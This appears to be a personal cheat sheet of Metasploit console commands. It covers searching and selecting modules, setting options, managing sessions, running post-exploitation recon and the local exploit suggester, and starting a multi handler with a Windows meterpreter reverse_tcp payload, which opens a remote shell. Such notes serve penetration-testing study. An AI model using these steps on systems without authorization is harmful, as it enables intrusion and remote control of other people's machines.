search <name>
#Use
use <name>
#See options
options
#Set options
set
#list active sessions
sessions
#On meterpreter
background
#New payload
use exploit <exploitname>
set session <sessionID>
#Recon
use post/multi/recon
#Muli handler
use exploit/multi/handler
# local exploits
use post/multi/recon/local_exploit_suggester
#Windows
set payload windows/meterpreter/reverse_tcp